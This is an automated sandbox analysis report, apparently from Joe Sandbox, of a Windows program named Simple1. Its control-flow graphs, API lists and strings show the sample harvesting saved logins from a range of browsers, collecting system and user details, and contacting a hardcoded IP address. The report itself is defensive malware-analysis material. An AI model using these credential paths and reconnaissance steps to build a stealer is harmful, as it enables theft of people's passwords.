7ff7cea966b1-7ff7cea966e5 call 7ff7cea95510 call 7ff7cea91b50 684->699 700 7ff7cea9667c-7ff7cea9668e 684->700 686->687 689 7ff7cea9672c-7ff7cea96732 _invalid_parameter_noinfo_noreturn 686->689 687->684 692 7ff7cea96733-7ff7cea9673b call 7ff7cea9b500 689->692 698 7ff7cea9673c-7ff7cea96744 692->698 698->556 701 7ff7cea96746-7ff7cea96757 698->701 710 7ff7cea966ea-7ff7cea966f2 699->710 702 7ff7cea96690-7ff7cea966a3 700->702 703 7ff7cea966ac call 7ff7cea9b500 700->703 701->552 704 7ff7cea96759-7ff7cea9676c 701->704 702->703 706 7ff7cea966a5-7ff7cea966ab _invalid_parameter_noinfo_noreturn 702->706 703->699 704->548 704->552 706->703 710->698 711 7ff7cea966f4-7ff7cea96715 call 7ff7cea9a1c0 710->711 711->692 714 7ff7cea96717-7ff7cea9672a 711->714 714->689 714->692
              APIs
              • GetConsoleWindow.KERNELBASE ref: 00007FF7CEA95DC1
              • ShowWindow.USER32 ref: 00007FF7CEA95DCF
                • Part of subcall function 00007FF7CEA99610: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF7CEA91CCF), ref: 00007FF7CEA99656
                • Part of subcall function 00007FF7CEA94A40: memset.VCRUNTIME140(?), ref: 00007FF7CEA94A96
                • Part of subcall function 00007FF7CEA94A40: memset.VCRUNTIME140(?), ref: 00007FF7CEA94AAA
                • Part of subcall function 00007FF7CEA94A40: memset.VCRUNTIME140(?), ref: 00007FF7CEA94ABE
                • Part of subcall function 00007FF7CEA94A40: memset.VCRUNTIME140(?), ref: 00007FF7CEA94AD2
                • Part of subcall function 00007FF7CEA94A40: memset.VCRUNTIME140(?), ref: 00007FF7CEA94AE3
                • Part of subcall function 00007FF7CEA94A40: RegOpenKeyExA.KERNELBASE(?), ref: 00007FF7CEA94B13
                • Part of subcall function 00007FF7CEA94A40: RegGetValueA.KERNELBASE ref: 00007FF7CEA94B4C
                • Part of subcall function 00007FF7CEA94A40: RegCloseKey.KERNELBASE ref: 00007FF7CEA94B89
                • Part of subcall function 00007FF7CEA94A40: RegOpenKeyExA.KERNELBASE ref: 00007FF7CEA94BB8
                • Part of subcall function 00007FF7CEA94A40: RegGetValueA.KERNELBASE ref: 00007FF7CEA94BF1
                • Part of subcall function 00007FF7CEA983C0: memcpy.VCRUNTIME140 ref: 00007FF7CEA98417
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA95E4F
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA95EBD
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA95F2B
              • GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7CEA95F5A
              • memset.VCRUNTIME140 ref: 00007FF7CEA95F6C
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF7CEA95F9A
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA9607C
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA96089
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9613E
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA961AC
              • memcpy.VCRUNTIME140 ref: 00007FF7CEA962B9
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA96340
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9637F
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA963ED
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9645B
                • Part of subcall function 00007FF7CEA9B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7CEA9107B), ref: 00007FF7CEA9B522
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA964B3
              • memset.VCRUNTIME140 ref: 00007FF7CEA964CB
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA9684A
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF7CEA96866
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA96898
              • GetModuleFileNameA.KERNEL32 ref: 00007FF7CEA964E9
                • Part of subcall function 00007FF7CEA999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A69
                • Part of subcall function 00007FF7CEA999F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A89
                • Part of subcall function 00007FF7CEA999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A99
                • Part of subcall function 00007FF7CEA999F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B7C
                • Part of subcall function 00007FF7CEA999F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B83
                • Part of subcall function 00007FF7CEA999F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B90
                • Part of subcall function 00007FF7CEA999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99AE6
                • Part of subcall function 00007FF7CEA999F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B0F
                • Part of subcall function 00007FF7CEA999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B36
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA965E3
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA965F0
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA966A5
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9672C
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9676E
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA967C0
                • Part of subcall function 00007FF7CEA91310: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF7CEA9131B
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA96804
                • Part of subcall function 00007FF7CEA91270: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CEA9B543), ref: 00007FF7CEA912B4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@$memset$U?$char_traits@_W@std@@@std@@memcpy$??1?$basic_ios@??1?$basic_iostream@?good@ios_base@std@@?sputc@?$basic_streambuf@OpenValueWindow$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CloseConcurrency::cancel_current_taskConsoleD@std@@@1@@FileGlobalMemoryModuleNameOsfx@?$basic_ostream@_ShowStatusV01@_V12@V?$basic_streambuf@Xlength_error@std@@__std_exception_copymalloc
              • String ID: ADAPTERS INFO:$CPU INFO:$DISK INFO:$DOMAIN AND TZ INFO:$LOCALE INFO:$PROCESSES RUNNING:$RAM INFO:$USERS INFO:$ IP: $ MB$185.237.165.97$@$Executable Path: $MACHINE INFO:$Total Physical Memory:
              • API String ID: 2962708308-876331821
              • Opcode ID: 759681f5c6d8fd6498326c7a5f859891147f6409f7f816d3394d5c1a26cfdfcc
              • Instruction ID: 47ffe0ccf2a7bde73b7f8ad2e3230d7ae0ee36b968fb53c9a6a3d70d5c3adead
              • Opcode Fuzzy Hash: 759681f5c6d8fd6498326c7a5f859891147f6409f7f816d3394d5c1a26cfdfcc
              • Instruction Fuzzy Hash: 7A52A362B14A8699EF10EF64DC407BDA361BF857B4F805632EA6D67AE9DF2CD440C310

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 715 7ff7cea95510-7ff7cea9555e malloc 716 7ff7cea95570-7ff7cea955d4 GetEnvironmentVariableW call 7ff7cea98280 free call 7ff7cea99e30 call 7ff7cea950e0 715->716 717 7ff7cea95560-7ff7cea9556b 715->717 727 7ff7cea95610-7ff7cea9564c call 7ff7cea99e30 call 7ff7cea950e0 716->727 728 7ff7cea955d6-7ff7cea955ed 716->728 718 7ff7cea95d4b-7ff7cea95d79 call 7ff7cea9b4e0 717->718 736 7ff7cea95651-7ff7cea9565d 727->736 729 7ff7cea955ef-7ff7cea95602 728->729 730 7ff7cea9560b call 7ff7cea9b500 728->730 729->730 732 7ff7cea95604-7ff7cea9560a _invalid_parameter_noinfo_noreturn 729->732 730->727 732->730 737 7ff7cea9565f-7ff7cea95678 736->737 738 7ff7cea9569b-7ff7cea957f3 call 7ff7cea99e30 * 8 call 7ff7cea990c0 call 7ff7cea99e30 call 7ff7cea9ac60 736->738 740 7ff7cea95696 call 7ff7cea9b500 737->740 741 7ff7cea9567a-7ff7cea9568d 737->741 765 7ff7cea95830-7ff7cea9584a call 7ff7cea9a9d0 738->765 766 7ff7cea957f5-7ff7cea9582e memcpy 738->766 740->738 741->740 744 7ff7cea9568f-7ff7cea95695 _invalid_parameter_noinfo_noreturn 741->744 744->740 767 7ff7cea9584f-7ff7cea958f2 call 7ff7cea990c0 call 7ff7cea99e30 call 7ff7cea9ac60 765->767 766->767 775 7ff7cea9592f-7ff7cea95949 call 7ff7cea9a9d0 767->775 776 7ff7cea958f4-7ff7cea9592d memcpy 767->776 777 7ff7cea9594e-7ff7cea959f9 call 7ff7cea9b508 775->777 776->777 781 7ff7cea95a00-7ff7cea95a24 call 7ff7cea994e0 777->781 784 7ff7cea95a26-7ff7cea95a5d call 7ff7cea9a1c0 call 7ff7cea9b544 781->784 789 7ff7cea95a5f-7ff7cea95a76 784->789 790 7ff7cea95a99-7ff7cea95aad 784->790 791 7ff7cea95a94 call 7ff7cea9b500 789->791 792 7ff7cea95a78-7ff7cea95a8b 789->792 793 7ff7cea95aaf-7ff7cea95ac5 790->793 794 7ff7cea95ae8-7ff7cea95afa 790->794 791->790 792->791 795 7ff7cea95a8d-7ff7cea95a93 _invalid_parameter_noinfo_noreturn 792->795 797 7ff7cea95ae3 call 7ff7cea9b500 793->797 798 7ff7cea95ac7-7ff7cea95ada 793->798 799 7ff7cea95b36-7ff7cea95b3f 794->799 800 7ff7cea95afc-7ff7cea95b12 794->800 795->791 797->794 798->797 803 7ff7cea95adc-7ff7cea95ae2 _invalid_parameter_noinfo_noreturn 798->803 801 7ff7cea95b41-7ff7cea95b58 799->801 802 7ff7cea95b7b-7ff7cea95b8f 799->802 805 7ff7cea95b30-7ff7cea95b35 call 7ff7cea9b500 800->805 806 7ff7cea95b14-7ff7cea95b27 800->806 808 7ff7cea95b76 call 7ff7cea9b500 801->808 809 7ff7cea95b5a-7ff7cea95b6d 801->809 810 7ff7cea95b91-7ff7cea95ba7 802->810 811 7ff7cea95bca-7ff7cea95bdc 802->811 803->797 805->799 806->805 812 7ff7cea95b29-7ff7cea95b2f _invalid_parameter_noinfo_noreturn 806->812 808->802 809->808 814 7ff7cea95b6f-7ff7cea95b75 _invalid_parameter_noinfo_noreturn 809->814 816 7ff7cea95bc5 call 7ff7cea9b500 810->816 817 7ff7cea95ba9-7ff7cea95bbc 810->817 818 7ff7cea95c17-7ff7cea95c57 811->818 819 7ff7cea95bde-7ff7cea95bf4 811->819 812->805 814->808 816->811 817->816 824 7ff7cea95bbe-7ff7cea95bc4 _invalid_parameter_noinfo_noreturn 817->824 822 7ff7cea95c90-7ff7cea95cb2 818->822 823 7ff7cea95c59-7ff7cea95c6d 818->823 820 7ff7cea95c12 call 7ff7cea9b500 819->820 821 7ff7cea95bf6-7ff7cea95c09 819->821 820->818 821->820 826 7ff7cea95c0b-7ff7cea95c11 _invalid_parameter_noinfo_noreturn 821->826 830 7ff7cea95cf3-7ff7cea95d0d 822->830 831 7ff7cea95cb4-7ff7cea95cc8 822->831 828 7ff7cea95c6f-7ff7cea95c82 823->828 829 7ff7cea95c8b call 7ff7cea9b500 823->829 824->816 826->820 828->829 833 7ff7cea95c84-7ff7cea95c8a _invalid_parameter_noinfo_noreturn 828->833 829->822 830->718 832 7ff7cea95d0f-7ff7cea95d28 830->832 835 7ff7cea95ce6-7ff7cea95ceb call 7ff7cea9b500 831->835 836 7ff7cea95cca-7ff7cea95cdd 831->836 837 7ff7cea95d46 call 7ff7cea9b500 832->837 838 7ff7cea95d2a-7ff7cea95d3d 832->838 833->829 835->830 836->835 839 7ff7cea95cdf-7ff7cea95ce5 _invalid_parameter_noinfo_noreturn 836->839 837->718 838->837 842 7ff7cea95d3f-7ff7cea95d45 _invalid_parameter_noinfo_noreturn 838->842 839->835 842->837
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$EnvironmentVariablefreemalloc
              • String ID: ?????? ??????: $USERPROFILE$\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\AppData\Local\Chromium\User Data\Default\Login Data$\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data$\AppData\Local\Google\Chrome\User Data\Default\Login Data$\AppData\Local\Microsoft\Edge\User Data\Default\Login Data$\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data$\AppData\Roaming\Mozilla\Firefox\Profiles$\AppData\Roaming\Mozilla\Firefox\Profiles\$\AppData\Roaming\Opera Software\Opera GX Stable\Login Data$\AppData\Roaming\Opera Software\Opera Stable\Login Data$\logins.json$\times.json$defa$rele$rele
              • API String ID: 716798019-1786275549
              • Opcode ID: cf1a96ae52e39750a6f6db40f34a451b3bf87bc4091000d337629dce12d692df
              • Instruction ID: 114cd7e9622c73b48852ae89ec2103e36debe33f4f295a7ac116e18181f60f93
              • Opcode Fuzzy Hash: cf1a96ae52e39750a6f6db40f34a451b3bf87bc4091000d337629dce12d692df
              • Instruction Fuzzy Hash: DF32C572A14BC699EB20EF24DC457FD6361FB847A4F805232DA5D27AA9DF38D684C310

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 844 7ff7cea94a40-7ff7cea94b1b call 7ff7cea9c530 memset * 5 call 7ff7cea96810 RegOpenKeyExA 849 7ff7cea94b97-7ff7cea94bc0 RegOpenKeyExA 844->849 850 7ff7cea94b1d-7ff7cea94b54 RegGetValueA 844->850 851 7ff7cea94bc2-7ff7cea94bf9 RegGetValueA 849->851 852 7ff7cea94c3c-7ff7cea94c65 RegOpenKeyExA 849->852 853 7ff7cea94b84-7ff7cea94b8f RegCloseKey 850->853 854 7ff7cea94b56-7ff7cea94b7f call 7ff7cea999f0 * 3 850->854 855 7ff7cea94c29-7ff7cea94c34 RegCloseKey 851->855 856 7ff7cea94bfb-7ff7cea94c24 call 7ff7cea999f0 * 3 851->856 857 7ff7cea94c6b-7ff7cea94ca2 RegGetValueA 852->857 858 7ff7cea94d4c-7ff7cea94d78 852->858 853->849 854->853 855->852 856->855 863 7ff7cea94cd2-7ff7cea94d09 RegGetValueA 857->863 864 7ff7cea94ca4-7ff7cea94ccd call 7ff7cea999f0 * 3 857->864 861 7ff7cea94d7a-7ff7cea94d84 858->861 862 7ff7cea94d9b-7ff7cea94d9e 858->862 861->862 869 7ff7cea94d86-7ff7cea94d99 861->869 872 7ff7cea94da0-7ff7cea94daa 862->872 873 7ff7cea94dc2-7ff7cea94dc7 862->873 866 7ff7cea94d39-7ff7cea94d44 RegCloseKey 863->866 867 7ff7cea94d0b-7ff7cea94d34 call 7ff7cea999f0 * 3 863->867 864->863 866->858 867->866 876 7ff7cea94dcc-7ff7cea94dcf 869->876 872->873 879 7ff7cea94dac-7ff7cea94dc0 872->879 873->876 880 7ff7cea94dd1-7ff7cea94dd9 call 7ff7cea996c0 876->880 881 7ff7cea94dda-7ff7cea94e45 call 7ff7cea97c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff7cea9b4e0 876->881 879->876 880->881
              APIs
              • memset.VCRUNTIME140(?), ref: 00007FF7CEA94A96
              • memset.VCRUNTIME140(?), ref: 00007FF7CEA94AAA
              • memset.VCRUNTIME140(?), ref: 00007FF7CEA94ABE
              • memset.VCRUNTIME140(?), ref: 00007FF7CEA94AD2
              • memset.VCRUNTIME140(?), ref: 00007FF7CEA94AE3
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA9684A
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF7CEA96866
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA96898
              • RegOpenKeyExA.KERNELBASE(?), ref: 00007FF7CEA94B13
              • RegGetValueA.KERNELBASE ref: 00007FF7CEA94B4C
              • RegCloseKey.KERNELBASE ref: 00007FF7CEA94B89
              • RegOpenKeyExA.KERNELBASE ref: 00007FF7CEA94BB8
              • RegGetValueA.KERNELBASE ref: 00007FF7CEA94BF1
              • RegCloseKey.ADVAPI32 ref: 00007FF7CEA94C2E
              • RegOpenKeyExA.KERNELBASE ref: 00007FF7CEA94C5D
              • RegGetValueA.KERNELBASE ref: 00007FF7CEA94C9A
              • RegGetValueA.KERNELBASE ref: 00007FF7CEA94D01
              • RegCloseKey.KERNELBASE ref: 00007FF7CEA94D3E
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA94E0F
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA94E19
                • Part of subcall function 00007FF7CEA999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A69
                • Part of subcall function 00007FF7CEA999F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A89
                • Part of subcall function 00007FF7CEA999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A99
                • Part of subcall function 00007FF7CEA999F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B7C
                • Part of subcall function 00007FF7CEA999F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B83
                • Part of subcall function 00007FF7CEA999F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B90
                • Part of subcall function 00007FF7CEA999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99AE6
                • Part of subcall function 00007FF7CEA999F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B0F
                • Part of subcall function 00007FF7CEA999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B36
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$memset$Value$CloseOpenU?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@Osfx@?$basic_ostream@_V12@V?$basic_streambuf@
              • String ID: BaseBoardProduct$DisplayVersion$HARDWARE\DESCRIPTION\System\BIOS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Machine name: $OS display version: $OS name: $Processor name: $ProcessorNameString$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
              • API String ID: 20268565-1502927450
              • Opcode ID: 621b55e935ff6405d9fe05d3b75cbcd6982443e8c92c0c421b99860315d121c5
              • Instruction ID: cc35c71097708f9a850e1b3acd6a29e43e17dcd8d1e603afced815ab5136c72c
              • Opcode Fuzzy Hash: 621b55e935ff6405d9fe05d3b75cbcd6982443e8c92c0c421b99860315d121c5
              • Instruction Fuzzy Hash: C3B15F72A18B8199EB10EF25EC806BDB3A4FF84794F808132DA8D67A69DF3CD545C750

              Control-flow Graph

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: Http$CloseHandle$DataOpenRequestmemcpy$AvailableConnectQueryReadReceiveResponseSend_invalid_parameter_noinfo_noreturnmemset
              • String ID: GET$Unable to get IP$WinHTTP/1.0$api.ipify.org
              • API String ID: 849217320-4095685055
              • Opcode ID: bb1e038c47dcd19b0d5ca6d5e52eb04ef700f44ac4d6c11cb81c477ed665ef84
              • Instruction ID: 413f3c9c6da29c72885a448559a893d2a8176ab481618aaa2217f33d3a499439
              • Opcode Fuzzy Hash: bb1e038c47dcd19b0d5ca6d5e52eb04ef700f44ac4d6c11cb81c477ed665ef84
              • Instruction Fuzzy Hash: 6761B522A187418AEB10EF25E850B7EB3E0FB85BA4F944534DA8D13B55DF3DD481CB20

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 979 7ff7cea94640-7ff7cea946a0 GetLocaleInfoA 980 7ff7cea946a2-7ff7cea946c2 call 7ff7cea9a0c0 979->980 981 7ff7cea946c7-7ff7cea946e2 979->981 986 7ff7cea94785-7ff7cea947af call 7ff7cea9b4e0 980->986 983 7ff7cea946e5-7ff7cea946ec 981->983 983->983 985 7ff7cea946ee-7ff7cea94722 call 7ff7cea9a0c0 GetLocaleInfoA 983->985 990 7ff7cea947b0-7ff7cea947bf 985->990 991 7ff7cea94728-7ff7cea94751 call 7ff7cea9a0c0 985->991 994 7ff7cea947c6-7ff7cea947cd 990->994 991->986 997 7ff7cea94753-7ff7cea94765 991->997 994->994 996 7ff7cea947cf-7ff7cea94902 call 7ff7cea9a0c0 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ call 7ff7cea999f0 call 7ff7cea9b250 call 7ff7cea999f0 call 7ff7cea9b250 call 7ff7cea999f0 994->996 1014 7ff7cea94904-7ff7cea9490e 996->1014 1015 7ff7cea94925-7ff7cea94928 996->1015 999 7ff7cea94780 call 7ff7cea9b500 997->999 1000 7ff7cea94767-7ff7cea9477a 997->1000 999->986 1000->999 1003 7ff7cea94a33-7ff7cea94a39 _invalid_parameter_noinfo_noreturn 1000->1003 1014->1015 1016 7ff7cea94910-7ff7cea94923 1014->1016 1017 7ff7cea9492a-7ff7cea94934 1015->1017 1018 7ff7cea9494c-7ff7cea94951 1015->1018 1019 7ff7cea94956-7ff7cea94959 1016->1019 1017->1018 1020 7ff7cea94936-7ff7cea9494a 1017->1020 1018->1019 1021 7ff7cea94964-7ff7cea949aa call 7ff7cea97c10 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 1019->1021 1022 7ff7cea9495b-7ff7cea94963 call 7ff7cea996c0 1019->1022 1020->1019 1027 7ff7cea949e1-7ff7cea949fc 1021->1027 1028 7ff7cea949ac-7ff7cea949be 1021->1028 1022->1021 1027->986 1031 7ff7cea94a02-7ff7cea94a14 1027->1031 1029 7ff7cea949c0-7ff7cea949d3 1028->1029 1030 7ff7cea949dc call 7ff7cea9b500 1028->1030 1029->1030 1032 7ff7cea949d5-7ff7cea949db _invalid_parameter_noinfo_noreturn 1029->1032 1030->1027 1031->999 1034 7ff7cea94a1a-7ff7cea94a2d 1031->1034 1032->1030 1034->999 1034->1003
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
